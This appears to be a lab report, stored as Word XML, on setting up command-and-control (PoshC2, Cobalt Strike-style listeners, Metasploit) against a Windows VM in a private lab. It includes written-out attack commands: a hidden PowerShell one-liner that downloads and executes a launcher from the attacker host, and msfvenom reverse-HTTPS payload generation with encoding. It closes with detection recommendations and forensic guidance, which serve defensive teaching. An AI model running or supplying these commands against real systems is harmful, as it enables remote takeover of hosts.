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6FCD" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Task 1 — Advanced C2 Lab (Full Report)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E40C92" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Author: MALEPATI SAMSKAR REDDY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC33C0C" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Date: September 19, 2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE34744" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Kali IP: 192.168.17.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D31CA4D" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Windows VM IP: 192.168.17.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2ADA91" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390FCA69" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD500E7" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Set up a Command &amp; Control (C2) infrastructure in a controlled lab, generate and customize payloads, deliver them to the target, establish interactive sessions, and evaluate persistence and detectability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9060D4" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. Lab Environment &amp; Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DF86B9" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A403BA6" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Attacker: Kali Linux — 192.168.17.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3D4457" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Target: Windows VM — 192.168.17.129 (Wazuh agent installed for detection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6273B32B" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAD5250" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- PoshC2 (primary C2 framework used in provided screenshots)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133B8ACD" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Cobalt Strike (mentioned as example; payload strategy mirrors Cobalt Strike beacons)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4895BD" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Metasploit (for payload generation &amp; handlers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A5677F" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- PowerShell (stageless launcher execution on target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71806C71" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. Step-by-Step Methodology (with example commands)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CD2E40" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The following commands are reconstructed from the observed artifacts and are typical of the workflow used to set up and run a C2 in a lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6874292F" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>A. Start and configure PoshC2 server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5CEB68" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Example commands (PoshC2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BFCDDF" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t># Start PoshC2 server (interactive)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>git clone https://github.com/nettitude/PoshC2.git</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cd PoshC2/PoshC2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>python3 poshc2.py</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># In PoshC2 console:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>&gt; server start</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>&gt; generate -p windows -t powershell -o /var/www/html/payloads/launcher.ps1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4749BCBA" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>B. Configure HTTPS listener (Cobalt Strike style) — example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DA07CE" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t># In Cobalt Strike listener config (example)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>set LHOST 192.168.17.128</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>set LPORT 443</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>set PAYLOAD windows/beacon_https</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>generate</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="316A5AAE" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>C. Generate stageless PowerShell payload and other payload formats (EXE, HTA):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58258DF7" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t># Stageless PowerShell (poshc2 generated launcher)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># Example: host a payload and use a one-liner to execute on target</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Invoke-Expression (New-Object Net.WebClient).DownloadString('http://192.168.17.128/payloads/launcher.ps1')</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># msfvenom example for exe payload (if using Metasploit)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.17.128 LPORT=443 -f exe -o payload.exe -e x86/shikata_ga_nai -i 3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C424E2" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>D. Deliver and execute payload on Windows VM (examples):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C7B803" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t># Example delivery vectors in a lab:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 1) Social engineering / phishing link to launcher.ps1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 2) Lateral transfer and manual execution on target</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 3) Exploit + drop and execute</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># Example PowerShell one-liner to execute staged/stageless payload:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">powershell.exe -NoP -NonI -W Hidden -EncodedCommand </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;BASE64_PAYLOAD&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C02960" w14:textId="137B36D2" w:rsidR="003716BB" w:rsidRDefault="00000000" w:rsidP="000B2D20">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. Observed Evidence ()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FFFD73" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Screenshot From 2025-09-09 00-37-37.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AAF9BE" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Screenshot From 2025-09-09 00-38-02.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243BED7A" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Screenshot From 2025-09-17 22-55-50.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A123A1D" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Screenshot From 2025-09-18 18-44-24.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184C2761" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Screenshot From 2025-09-18 18-44-31.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8F7A99" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Screenshot From 2025-09-18 18-45-07.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675F088F" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Screenshot From 2025-09-18 19-01-33.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D85301" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Screenshot From 2025-09-18 19-02-25.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF52D45" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Screenshot From 2025-09-18 19-14-04.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D69D16" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5. Timeline of Events (reconstructed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785539D8" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:br/>
        <w:t>- T0: PoshC2 server installation and configuration completed on attacker (Kali).</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- T1: HTTPS listener created on 192.168.17.128:443.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- T2: Multiple payloads generated (PowerShell launcher, EXE payloads) and placed on web host (/var/www/html/payloads/).</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- T3: Payload delivered to Windows VM (192.168.17.129) and executed via PowerShell in-memory (stageless execution).</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- T4: Beacon callback observed; session SID001 established and operator obtained interactive shell.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- T5: Post-exploitation commands executed in-memory; persistence and recon activities performed.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="78990009" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6. Findings &amp; Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A3611E" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Active C2: A live beacon (HTTPS) successfully connected to the attacker and allowed remote command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D17B83" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Fileless execution: PowerShell-based stageless payloads executed in memory, reducing disk artifacts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7C3299" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Detection gaps: Without script block logging and EDR tuned to encoded commands, such activity can be missed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ADE189" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>- Risk Rating: High (operational compromise; remote control of host).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B22952" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7. MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E825D9" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- T1071.001 — Application Layer Protocol: Web Protocols (HTTPS beaconing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F00E7B9" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- T1059.001 — Command and Scripting Interpreter: PowerShell (encoded, fileless execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C681A4" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- T1105 — Ingress Tool Transfer (payload hosting and download)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A685DD4" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- T1086 — PowerShell (execution &amp; automation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E43B32" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8. Recommendations (technical &amp; operational)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBFDB4F" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Technical controls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114D3FFE" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Enable PowerShell Script Block Logging and Module Logging (Windows Eventing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9CA207" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Enable and monitor AMSI (Antimalware Scan Interface) logs for script activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2300CD92" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Deploy EDR with behavioral detection for suspicious parent-child process chains and frequent outbound beacons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DB2A82" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Implement TLS inspection / decrypt outbound HTTPS in a controlled manner to detect beacon payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FAC094" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Restrict PowerShell: use Constrained Language Mode for non-admins and apply application allowlisting for signed scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BAB148" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Operational controls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2FBD84" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Maintain an incident response playbook for C2 detection and containment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B867128" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Monitor for periodic beacon patterns, unusual domains, or uncommon TLS fingerprints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAFDD47" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Perform regular phishing exercises and harden remote code execution flows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C8CD26" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Regularly audit admin accounts and service accounts to prevent lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A731B46" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9. Suggested Forensic Artifacts to Collect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEA18A2" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Windows Event Logs: PowerShell operational and script block logs (Event IDs 4103/4104).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBFCE46" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Process creation logs (Sysmon) showing parent-child relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085941F4" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Network captures of outbound HTTPS to inspect beacon timing and SNI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6343DE1E" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- PoshC2 and web server access logs from attacker host showing payload requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAD12BE" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Memory capture of the compromised host for in-memory artifact analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B4E7CE" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>10. 50-Word Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2D8913" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Configured a PoshC2 HTTPS listener on Kali and generated stageless PowerShell payloads hosted for delivery. The Windows VM executed the launcher in-memory, creating a beacon session (SID001) to 192.168.17.128; remote command execution and persistence were demonstrated. Recommend PowerShell logging, EDR tuning, and network egress monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F0836D" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>11. Appendix: Reconstructed Commands &amp; Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEEF185" w14:textId="77777777" w:rsidR="003716BB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t># PoshC2 (example)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>git clone https://github.com/nettitude/PoshC2.git</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cd PoshC2/PoshC2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>python3 poshc2.py</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># In poshc2 console:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>&gt; server start</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>&gt; generate -p windows -t powershell -o /var/www/html/payloads/launcher.ps1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># Example PowerShell one-liner to fetch and run launcher (dev lab only)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>powershell -NoP -NonI -W Hidden -Command "IEX (New-Object Net.WebClient).DownloadString('http://192.168.17.128/payloads/launcher.ps1')"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># msfvenom (if used)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.17.128 LPORT=443 -f exe -o payload.exe -e x86/shikata_ga_nai -i 3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00371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818106">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="470052343">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="155532589">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2008744515">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="947389432">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="562253330">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="695354653">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1769080694">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="117056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D20"/>
    <w:rsid w:val="0015074B"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="003716BB"/>
    <w:rsid w:val="00A900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E279A"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{A417F269-CF77-4C19-8667-591CFE9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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-19T10:30:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>